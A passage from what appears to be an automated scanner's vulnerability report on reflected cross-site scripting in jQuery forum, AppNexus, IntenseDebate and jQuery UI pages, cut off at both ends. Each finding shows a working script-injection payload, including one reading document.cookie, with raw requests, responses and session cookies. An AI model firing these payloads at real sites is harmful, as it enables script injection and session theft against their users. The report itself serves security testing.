Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297134189.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 302
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 09 Feb 2011 13:29:30 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 11 Mar 2011 13:29:30 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297258170.60|1296659685.66; Domain=.addthis.com; Expires=Fri, 08-Feb-2013 13:29:29 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 09 Feb 2011 13:29:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 09 Feb 2011 13:29:30 GMT
Connection: close

_ate.ad.hpreb035<script>alert(1)</script>a932842a89f({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fxhtml.co.il%2f%2fhe%2fpage-700%2fjQuery%3f72f1f"],"segments" : ["60"],"l
...[SNIP]...

1.104. http://forum.jquery.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ff4e"><script>alert(1)</script>d3e1e6933e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8ff4e"><script>alert(1)</script>d3e1e6933e0=1 HTTP/1.1
Host: forum.jquery.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=44433727.1297257169.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.1932706098.1297257169.1297257169.1297257169.1; __utmc=44433727; __utmb=44433727.2.10.1297257169

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=df1e2a1c-0f2e-41ee-b0a9-ad8bca46be51; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=307D16EB1FA0C002C45B016345B7BD30; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 09 Feb 2011 13:15:45 GMT
Server: Apache-Coyote/1.1
Content-Length: 292833


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/?8ff4e"><script>alert(1)</script>d3e1e6933e0=1&forumGroupUrl=jquery">
...[SNIP]...

1.105. http://ib.adnxs.com/if [custom_macro parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The value of the custom_macro request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e23d"><script>alert(1)</script>5ac3272bd5f was submitted in the custom_macro parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /if?enc=AQAAAAAA4j-amZmZmZnePwAAAADXo_o_mpmZmZmZ3j8AAAAAAADiP9xIJgq8hAUXBWHfHSmrEEI7n1JNAAAAABuRAwA2AQAANwEAAAIAAABJ9wIA5GoAAAEAAABVU0QAVVNEAKAAWAKoAecEDAcAAgUCAAIAAAAARR2NVAAAAAA.&udj=uf%28%27a%27%2C+11322%2C+1297260347%29%3Buf%28%27c%27%2C+49259%2C+1297260347%29%3Buf%28%27r%27%2C+194377%2C+1297260347%29%3B&cnd=!hhQ2PQjrgAMQye4LGAAg5NUBKOcJMQAAAAAAAOI_QhMIABAAGAAgASj-__________8BSABQAFioA2AAaLcC&referrer=http://technorati.com/contact-us/&custom_macro=SEG_CODES_COL%5Ebtg=an.5%3Bbtg=an.51%3Bbtg=cm.de16_1%3Bbtg=cm.de18_1%3Bbtg=cm.ent_h%3Bbtg=cm.polit_h%3Bbtg=cm.shop_h%3Bbtg=cm.sports_h%3Bbtg=cm.sportsfan%3Bbtg=cm.sportsreg7e23d"><script>alert(1)</script>5ac3272bd5f HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://technorati.com/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfw)lmg324*cOV!/@E<Y:@`[idbmI:>w7e%:1E(@lNynpU8#zDeyWpB[QSo:*B_u8(JC>Q@1D2HfGr['`aEUt^DT'q0$S0(<nSEa'Uo/A76wL`s+szES:yl.J.]1eGLl?R9]CHArf1NCsp%=0s3Z_skui(:1Tb-QH!gzLte2*1%!V2#DdJcRwf4=RqtF=@1YS(].jBY%8>TzLXkrbDI0js.mBtkIO!*E@GnXW-wALCL43WoSaR#3xR?9dttLGTclDX`U*C^Q@Zu'+7=eOKD2DpIMJ_bfMqyLb-h44%YJq(_>G@^2^N5ag?dJ=ecL$RU($DV7fC<!T_*Ah4!NTEjqWL)o9vemKzwmb@8otxrpFof[`rt[Ie>I=J>5Oawt(eEg^^W3q_QyseEUQJT.JJqRyB`]dZ#'ii3gT%6Bp3<=@t2f7Q$p@dHe@!Vqq6U0Iu%98]IP<D7.$F:Rx#_SdW.a]RVl?Q2O(1<GGu(lU.Vj7'MO.Ns?z*tz3@.b/'X@.S@u(pc%.JEvl:+*D)9F(fo^>)4(rBmALG+^^no]+Sly^.C-P!+*wPR'hO5k#[sCHO#E%tZv^PeYc0vST.; sess=1; uuid2=4760492999213801733; icu=ChII3pUBEAoYByAHKAcwu77K6gQQu77K6gQYBg..

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 10-Feb-2011 14:09:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Tue, 10-May-2011 14:09:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Tue, 10-May-2011 14:09:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lmg324*cOV!/@E<Y:@`[idbmI:>w7e%:1E(@lNynpU8#zDeyWpB[QSo:*B_u8(JC>Q@1D2HfGr['`aEUt^DT'q0$S0(<nSEa'Uo/A76wL`s+szES:yl.J.]1eGLl?R9]CHArf1NCsp%=0s3Z_skui(:1Tb-QH!gzLte2*1%!V2#DdJcRwf4=RqtF=@1YS(].jBY%8>TzLXkrbDI0js.mBtkIO!*E@GnXW-wALCL43WoSaR#3xR?9dttLGTclDX`U*C^Q@Zu'+7=eOKD2DpIMJ_bfMqyLb-h44%YJq(_>G@^2^N5ag?dJ=ecL$RU($DV7fC<!T_*Ah4!NTEjqWL)o9vemKzwmb@8otxrpFof[`rt[Ie>I=J>5Oawt(eEg^^W3q_QyseEUQJT.JJqRyB`]dZ#'ii3gT%6Bp3<=@t2f7Q$p@dHe@!Vqq6U0Iu%98]IP<D7.$F:Rx#_SdW.a]RVl?Q2O(1<GGu(lU.Vj7'MO.Ns?z*tz3@.b/'X@.S@u(pc%.JEvl:+*D)9F(fo^>)4(rBmALG+^^no]+Sly^.C-P!+*wPR'hO5k#[sCHO#E%tZv^PeYc0vST.; path=/; expires=Tue, 10-May-2011 14:09:37 GMT; domain=.adnxs.com; HttpOnly
Date: Wed, 09 Feb 2011 14:09:37 GMT
Content-Length: 1569

<script language="JavaScript" src="http://ad.doubleclick.net/adj/cm.appnexus/nikon_ron_cpm;sz=160x600;app=nikon_ron_cpm;click0=http://ib.adnxs.com/click/AQAAAAAA4j-amZmZmZnePwAAAADXo_o_mpmZmZmZ3j8AAAA
...[SNIP]...
hnorati.com%2Fcontact-us%2F/clickenc=;ord=1297260347?;btg=app0;btg=an.5;btg=an.51;btg=cm.de16_1;btg=cm.de18_1;btg=cm.ent_h;btg=cm.polit_h;btg=cm.shop_h;btg=cm.sports_h;btg=cm.sportsfan;btg=cm.sportsreg7e23d"><script>alert(1)</script>5ac3272bd5f" type="text/javascript">
...[SNIP]...

1.106. http://intensedebate.com/empty.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /empty.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88920'><script>alert(1)</script>e89cf172d1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /empty.php88920'><script>alert(1)</script>e89cf172d1c HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4703

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.php88920'><script>alert(1)</script>e89cf172d1c'>
...[SNIP]...

1.107. http://intensedebate.com/empty.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /empty.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c427'><script>alert(1)</script>d010a75075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /empty.php/9c427'><script>alert(1)</script>d010a75075 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4703

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.php/9c427'><script>alert(1)</script>d010a75075'>
...[SNIP]...

1.108. http://intensedebate.com/idc/js/comment-func.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /idc/js/comment-func.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d4c5'><script>alert(1)</script>765cfe08e1b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idc/js/comment-func.php5d4c5'><script>alert(1)</script>765cfe08e1b?token=Jt8Cw5WmHtXpxKTmGFSNz5YhuzHqpag9&blogpostid=73949530&time=1297258315443 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4796

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/idc/js/comment-func.php5d4c5'><script>alert(1)</script>765cfe08e1b?token=Jt8Cw5WmHtXpxKTmGFSNz5YhuzHqpag9&blogpostid=73949530&time=1297258315443'>
...[SNIP]...

1.109. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/getCommentCounts.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bef9'><script>alert(1)</script>eaabf164f70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getCommentCounts.php9bef9'><script>alert(1)</script>eaabf164f70?src=wp-2&acct=bd93835423d7d4b2ee3980d6cba4c893&ids=2456|&guids=http%253A%252F%252Faddyosmani.com%252Fblog%252F%253Fp%253D2456|&links=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F|&titles=Spotlight%2Bon%2BjQuery%2B1.5%253A%2BjQuery.sub%2528%2529%2BExplained%2B%2528Screencast%2529|&authors=Addy|&times=2011-02-02%2B17%253A02%253A02| HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 5069

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getCommentCounts.php9bef9'><script>alert(1)</script>eaabf164f70?src=wp-2&acct=bd93835423d7d4b2ee3980d6cba4c893&ids=2456|&guids=http%253A%252F%252Faddyosmani.com%252Fblog%252F%253Fp%253D2456|&links=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F|&
...[SNIP]...

1.110. http://intensedebate.com/js/wordpressTemplateCommentWrapper2.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/wordpressTemplateCommentWrapper2.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96ded'><script>alert(1)</script>bb633d612d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/wordpressTemplateCommentWrapper2.php96ded'><script>alert(1)</script>bb633d612d5?acct=bd93835423d7d4b2ee3980d6cba4c893&postid=2456&title=Spotlight+on+jQuery+1.5%3A+jQuery.sub%28%29+Explained+%28Screencast%29&url=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F&posttime=2011-02-02+17%3A02%3A02&postauthor=Addy&guid=http%3A%2F%2Faddyosmani.com%2Fblog%2F%3Fp%3D2456 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 5033

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/wordpressTemplateCommentWrapper2.php96ded'><script>alert(1)</script>bb633d612d5?acct=bd93835423d7d4b2ee3980d6cba4c893&postid=2456&title=Spotlight+on+jQuery+1.5%3A+jQuery.sub%28%29+Explained+%28Screencast%29&url=http%3A%2F%2Faddyosmani.com%2Fblog%2Fvideo-jquerysub-explained%2F&pos
...[SNIP]...

1.111. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/wordpressTemplateLinkWrapper2.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2ec7c'><script>alert(1)</script>3810834b27b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/wordpressTemplateLinkWrapper2.php2ec7c'><script>alert(1)</script>3810834b27b?acct=bd93835423d7d4b2ee3980d6cba4c893 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4764

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php2ec7c'><script>alert(1)</script>3810834b27b?acct=bd93835423d7d4b2ee3980d6cba4c893'>
...[SNIP]...

1.112. http://intensedebate.com/remoteCheckin.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /remoteCheckin.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea701'><script>alert(1)</script>8c1d588c7f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /remoteCheckin.phpea701'><script>alert(1)</script>8c1d588c7f7?token=Jt8Cw5WmHtXpxKTmGFSNz5YhuzHqpag9&blogpostid=73949530&time=1297258315307 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4790

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/remoteCheckin.phpea701'><script>alert(1)</script>8c1d588c7f7?token=Jt8Cw5WmHtXpxKTmGFSNz5YhuzHqpag9&blogpostid=73949530&time=1297258315307'>
...[SNIP]...

1.113. http://intensedebate.com/remoteVisit.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /remoteVisit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dcc8a'><script>alert(1)</script>dfb1d1116fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /remoteVisit.phpdcc8a'><script>alert(1)</script>dfb1d1116fa?acct=bd93835423d7d4b2ee3980d6cba4c893&time=1297258315030 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 13:31:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4766

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/remoteVisit.phpdcc8a'><script>alert(1)</script>dfb1d1116fa?acct=bd93835423d7d4b2ee3980d6cba4c893&time=1297258315030'>
...[SNIP]...

1.114. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d819"><script>alert(1)</script>83856e3d441 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

